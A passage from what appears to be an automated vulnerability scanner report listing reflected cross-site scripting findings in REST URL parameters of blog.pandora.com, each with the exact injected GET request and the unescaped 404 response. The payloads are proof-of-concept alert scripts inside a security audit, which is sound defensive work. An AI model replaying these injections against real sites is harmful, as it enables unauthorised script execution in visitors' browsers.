Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4f087<script>alert(1)</script>fe8192ca492/2006/06/ was not found on this server.</p>
...[SNIP]...

3.63. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/06/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3dbfc<script>alert(1)</script>cae8c69d562 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20063dbfc<script>alert(1)</script>cae8c69d562/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20063dbfc<script>alert(1)</script>cae8c69d562/06/ was not found on this server.</p>
...[SNIP]...

3.64. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/06/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c455f<script>alert(1)</script>b6d36241d5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/06c455f<script>alert(1)</script>b6d36241d5f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/06c455f<script>alert(1)</script>b6d36241d5f/ was not found on this server.</p>
...[SNIP]...

3.65. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/07/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd617<script>alert(1)</script>7f88e7ca374 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorafd617<script>alert(1)</script>7f88e7ca374/archives/2006/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorafd617<script>alert(1)</script>7f88e7ca374/archives/2006/07/ was not found on this server.</p>
...[SNIP]...

3.66. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/07/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec7f7<script>alert(1)</script>d0c5fa2a196 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesec7f7<script>alert(1)</script>d0c5fa2a196/2006/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesec7f7<script>alert(1)</script>d0c5fa2a196/2006/07/ was not found on this server.</p>
...[SNIP]...

3.67. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/07/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 23e21<script>alert(1)</script>f8392586fa0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200623e21<script>alert(1)</script>f8392586fa0/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200623e21<script>alert(1)</script>f8392586fa0/07/ was not found on this server.</p>
...[SNIP]...

3.68. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/07/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1665f<script>alert(1)</script>f197cc616af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/071665f<script>alert(1)</script>f197cc616af/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/071665f<script>alert(1)</script>f197cc616af/ was not found on this server.</p>
...[SNIP]...

3.69. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1e163<script>alert(1)</script>746a263de0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora1e163<script>alert(1)</script>746a263de0b/archives/2006/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora1e163<script>alert(1)</script>746a263de0b/archives/2006/08/ was not found on this server.</p>
...[SNIP]...

3.70. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c27be<script>alert(1)</script>78a1bab0ca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesc27be<script>alert(1)</script>78a1bab0ca3/2006/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc27be<script>alert(1)</script>78a1bab0ca3/2006/08/ was not found on this server.</p>
...[SNIP]...

3.71. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b3449<script>alert(1)</script>fffe6e73560 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006b3449<script>alert(1)</script>fffe6e73560/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006b3449<script>alert(1)</script>fffe6e73560/08/ was not found on this server.</p>
...[SNIP]...

3.72. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 41581<script>alert(1)</script>c6f00e54db1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/0841581<script>alert(1)</script>c6f00e54db1/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/0841581<script>alert(1)</script>c6f00e54db1/ was not found on this server.</p>
...[SNIP]...

3.73. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fc284<script>alert(1)</script>5ac9a5cf490 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorafc284<script>alert(1)</script>5ac9a5cf490/archives/2006/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorafc284<script>alert(1)</script>5ac9a5cf490/archives/2006/09/ was not found on this server.</p>
...[SNIP]...

3.74. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 29463<script>alert(1)</script>88dd0003541 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives29463<script>alert(1)</script>88dd0003541/2006/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives29463<script>alert(1)</script>88dd0003541/2006/09/ was not found on this server.</p>
...[SNIP]...

3.75. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 826cd<script>alert(1)</script>9d679957bf3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006826cd<script>alert(1)</script>9d679957bf3/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006826cd<script>alert(1)</script>9d679957bf3/09/ was not found on this server.</p>
...[SNIP]...

3.76. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a7029<script>alert(1)</script>c9c50ef33cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/09a7029<script>alert(1)</script>c9c50ef33cc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/09a7029<script>alert(1)</script>c9c50ef33cc/ was not found on this server.</p>
...[SNIP]...

3.77. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/10/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2dc61<script>alert(1)</script>2a8a18ec9e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2dc61<script>alert(1)</script>2a8a18ec9e0/archives/2006/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2dc61<script>alert(1)</script>2a8a18ec9e0/archives/2006/10/ was not found on this server.</p>
...[SNIP]...

3.78. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/10/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee470<script>alert(1)</script>1e1c157cf31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesee470<script>alert(1)</script>1e1c157cf31/2006/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesee470<script>alert(1)</script>1e1c157cf31/2006/10/ was not found on this server.</p>
...[SNIP]...

3.79. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/10/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9eab0<script>alert(1)</script>503e2b138de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20069eab0<script>alert(1)</script>503e2b138de/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
